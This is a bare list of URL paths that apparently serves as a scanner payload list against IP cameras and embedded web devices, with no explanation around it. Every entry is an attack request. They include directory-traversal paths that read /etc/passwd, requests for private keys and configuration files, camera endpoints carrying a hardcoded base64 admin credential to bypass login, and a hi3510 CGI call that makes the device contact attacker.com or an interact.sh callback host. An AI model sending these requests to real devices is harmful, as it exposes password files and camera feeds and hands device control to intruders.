/current_config/passwd
/../../etc/passwd
/overview.asp
/adm/file.cgi?next_file=%2fetc%2fpasswd
/../../../../../../../../../../../../../etc/passwd
/command/prima-factory.cgi
/../../../../../etc/passwd
/conf/nginx.conf
/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/self.key
/System/configurationFile?auth=YWRtaW46MTEK
/onvif-http/snapshot?auth=YWRtaW46MTEK
/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/Pages/login.htm
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh
/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Fattacker.com
/Security/users?auth=YWRtaW46MTEK
/config/cam_portal.cgi
